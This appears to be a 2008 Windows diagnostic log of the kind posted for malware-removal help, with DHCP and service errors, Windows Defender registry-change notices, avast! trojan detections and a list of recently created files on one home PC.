System - Error - 8/23/2008 12:26:32 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Service Control Manager -> Description = Timeout (30000 milliseconds) waiting for a transaction response from the stisvc service
System - Error - 8/23/2008 12:27:02 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Service Control Manager -> Description = Timeout (30000 milliseconds) waiting for a transaction response from the stisvc service
System - Warning - 8/23/2008 8:17:05 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/23/2008 8:17:05 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/23/2008 8:17:10 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/23/2008 8:17:10 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/23/2008 8:17:14 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/23/2008 8:17:14 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/23/2008 8:17:17 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/23/2008 8:17:17 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/23/2008 9:15:37 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/23/2008 9:15:37 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/23/2008 9:15:39 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/23/2008 9:15:39 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/23/2008 9:15:46 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Server -> Description = The server could not bind to the transport DeviceNetBTTcpipB2894969-D901-400B-BEAC-4704968BED16
System - Error - 8/23/2008 9:15:46 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Server -> Description = The server could not bind to the transport DeviceNetbiosSmb because another computer on the network has the same name  The server could not start
System - Warning - 8/24/2008 7:17:29 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = PlugPlayManager -> Description = Timed out sending notification of device interface change to window of IWMSWindow
System - Warning - 8/24/2008 7:17:29 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = PlugPlayManager -> Description = Timed out sending notification of device interface change to window of IWMSWindow
System - Warning - 8/24/2008 7:17:31 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 7:17:31 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/24/2008 7:17:37 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 7:17:37 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/24/2008 7:17:41 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 7:17:41 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/24/2008 7:17:44 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 7:17:44 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/24/2008 9:11:41 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 9:11:41 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/24/2008 9:11:46 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 9:11:46 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/24/2008 9:50:08 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 5BD82A96-CDF5-425C-B642-C39470C25E9CUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:14:08 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID BC2EECAC-B0F4-4272-A276-9743C6D100A0User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:14:36 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID AAC10109-9445-443C-9914-5A8E685479B6User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found usershellfolderHKCUS-1-5-21-3016711891-1204557993-285463850-1006SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersBackupCacheAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:14:36 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 989C169B-3D32-489E-AC4B-B434227AF38EUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found usershellfolderHKCUS-1-5-21-3016711891-1204557993-285463850-1006SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersBackupCookiesAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:14:36 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID C555F834-0D07-43B0-8CC6-12C28B7CE7B5User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found usershellfolderHKCUS-1-5-21-3016711891-1204557993-285463850-1006SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersBackupHistoryAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:14:36 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID C9B868CE-7A0D-475D-B65C-E0A93D751094User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found usershellfolderHKCUS-1-5-21-3016711891-1204557993-285463850-1006SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersBackupFavoritesAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:14:36 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 95C97162-25C4-4B93-8078-1C7743ADF7ACUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found usershellfolderHKCUS-1-5-21-3016711891-1204557993-285463850-1006SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersCookiesAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:14:36 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID AE2631C7-7E39-404D-95E7-3C32E0DDAECEUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found usershellfolderHKCUS-1-5-21-3016711891-1204557993-285463850-1006SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersHistoryAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:14:36 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID EF4E4296-94F3-48C0-B9EC-3DFF7216B5B0User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found usershellfolderHKCUS-1-5-21-3016711891-1204557993-285463850-1006SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersCacheAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:14:38 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID DFC620D8-4DF7-48E3-81AC-33588D459B30User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found usershellfolderHKCUS-1-5-21-3016711891-1204557993-285463850-1006SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersFavoritesAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:18:53 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 0558D223-368B-4E0E-B3EE-A97C244F796EUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found usershellfolderHKCUS-1-5-21-3016711891-1204557993-285463850-1006SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersCookiesAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:18:53 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID D1B3766B-90B6-45EB-BA25-8A75B26CBA2FUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found usershellfolderHKCUS-1-5-21-3016711891-1204557993-285463850-1006SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersCacheAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:18:53 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 5B329467-8E47-4562-9ECD-03315A8B59F9User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found usershellfolderHKCUS-1-5-21-3016711891-1204557993-285463850-1006SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersFavoritesAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 10:18:53 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 80587117-DB76-4052-8E37-FA5A3533AE5FUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found usershellfolderHKCUS-1-5-21-3016711891-1204557993-285463850-1006SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersHistoryAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 1:22:23 PM -> Computer Name = DJDKK5C1 - User Name = NT AUTHORITY\SYSTEM - Source = USER32 -> Description = The attempt to power off DJDKK5C1 failed
System - Warning - 8/24/2008 1:47:29 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 1:47:29 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/24/2008 1:47:35 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 1:47:35 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/24/2008 1:50:41 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 1:50:41 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/24/2008 1:50:45 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 1:50:45 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/24/2008 1:50:49 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 1:50:49 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/24/2008 1:52:23 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 9A7CCE75-021D-40FF-92CA-F84AB7B24262User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 1:53:01 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 3C793BF4-B223-4BE2-B282-249C186AD6CCUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 2:30:37 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 2:30:37 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/24/2008 2:30:43 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/24/2008 2:30:43 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Error - 8/24/2008 2:35:16 PM -> Computer Name = DJDKK5C1 - User Name = NT AUTHORITY\SYSTEM - Source = DCOM -> Description = 
System - Error - 8/24/2008 2:36:17 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Service Control Manager -> Description = The following boot-start or system-start driver(s) failed to load Aavmker4APPDRVaswSPFipsintelppm
System - Error - 8/24/2008 2:37:08 PM -> Computer Name = DJDKK5C1 - User Name = DJDKK5C1\Tom Jr - Source = DCOM -> Description = 
System - Error - 8/24/2008 2:44:32 PM -> Computer Name = DJDKK5C1 - User Name = DJDKK5C1\Tom Jr - Source = DCOM -> Description = 
System - Error - 8/24/2008 5:33:26 PM -> Computer Name = DJDKK5C1 - User Name = NT AUTHORITY\SYSTEM - Source = DCOM -> Description = 
System - Warning - 8/24/2008 5:35:03 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID A0E510B8-63D6-48A5-BCBD-3FC0B3F27820User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 6:05:07 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 2ADD022E-EFBB-4324-9452-6E3BE3C9F343User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/24/2008 6:05:10 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 7C1F4F22-4BDE-4DBF-8C67-72B4DCA94BB8User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
Antivirus - Warning - 8/18/2008 6:44:05 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = avast! -> Description = Sign of Win32Small-LLU Trj has been found in CsoftwareAdobePhotoshopCS3aps3ekgexe file
Antivirus - Warning - 8/19/2008 6:57:39 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = avast! -> Description = Sign of Win32Small-LLU Trj has been found in CSystem Volume Informationrestore129201FA-B0AC-49B3-96B2-DEB8B91E727BRP118A0030064exe file
Antivirus - Warning - 8/19/2008 7:19:34 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = avast! -> Description = Function setifaceUpdatePackages() has failed Return code is 0x20000011 dwRes is 20000011
Antivirus - Warning - 8/19/2008 7:11:06 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = avast! -> Description = Function setifaceUpdatePackages() has failed Return code is 0x000004C7 dwRes is 000004C7
Antivirus - Warning - 8/21/2008 1:05:21 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = avast! -> Description = Function setifaceUpdatePackages() has failed Return code is 0xC0000142 dwRes is C0000142
Antivirus - Warning - 8/21/2008 5:05:27 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = avast! -> Description = Function setifaceUpdatePackages() has failed Return code is 0xC0000142 dwRes is C0000142
Antivirus - Warning - 8/24/2008 9:43:50 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = avast! -> Description = Sign of Win32Inject-EV Trj has been found in CDOCUME1TOMJR1LOCALS1Tempsygdvprydll file
Antivirus - Warning - 8/24/2008 9:46:18 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = avast! -> Description = Sign of Win32Inject-EV Trj has been found in CDOCUME1TOMJR1LOCALS1Tempsygdvprydll file
Antivirus - Warning - 8/24/2008 9:52:29 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = avast! -> Description = Sign of Win32Inject-EV Trj has been found in CDOCUME1TOMJR1LOCALS1Tempsygdvprydll file
Antivirus - Warning - 8/24/2008 9:52:40 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = avast! -> Description = Sign of Win32Inject-EV Trj has been found in CDOCUME1TOMJR1LOCALS1Tempsygdvprydll file
Antivirus - Warning - 8/24/2008 9:54:44 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = avast! -> Description = Sign of Win32Inject-EV Trj has been found in CDOCUME1TOMJR1LOCALS1Tempsygdvprydll file
Antivirus - Warning - 8/24/2008 12:24:34 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = avast! -> Description = Function setifaceUpdatePackages() has failed Return code is 0xC0000142 dwRes is C0000142


[Files/Folders - Created Within 30 days]
Autorun.inf -> %SystemDrive%\Autorun.inf ->  [Ver =  | Size = 194 bytes | Created Date = 8/18/2008 7:25:05 PM | Attr = RHS]
hiberfil.sys -> %SystemDrive%\hiberfil.sys ->  [Ver =  | Size = 1063714816 bytes | Created Date = 8/24/2008 6:34:39 PM | Attr =  HS]
Radz_Services.vbs -> %SystemDrive%\Radz_Services.vbs ->  [Ver =  | Size = 5830 bytes | Created Date = 8/18/2008 7:25:05 PM | Attr =    ]
sowar.vbs -> %SystemDrive%\sowar.vbs ->  [Ver =  | Size = 5830 bytes | Created Date = 8/18/2008 7:25:05 PM | Attr = RHS]
404Fix.exe -> %SystemRoot%\System32\404Fix.exe -> S!Ri.URZ [Ver =  | Size = 82432 bytes | Created Date = 8/22/2008 8:52:26 PM | Attr =    ]
AntiXPVSTFix.exe -> %SystemRoot%\System32\AntiXPVSTFix.exe -> S!Ri.URZ [Ver =  | Size = 87552 bytes | Created Date = 8/22/2008 8:52:26 PM | Attr =    ]
dumphive.exe -> %SystemRoot%\System32\dumphive.exe ->  [Ver =  | Size = 51200 bytes | Created Date = 8/22/2008 8:52:25 PM | Attr =    ]
IEDFix.C.exe -> %SystemRoot%\System32\IEDFix.C.exe -> S!Ri.URZ [Ver =  | Size = 82432 bytes | Created Date = 8/22/2008 8:52:26 PM | Attr =    ]
IEDFix.exe -> %SystemRoot%\System32\IEDFix.exe -> S!Ri.URZ [Ver =  | Size = 82944 bytes | Created Date = 8/22/2008 8:52:25 PM | Attr =    ]
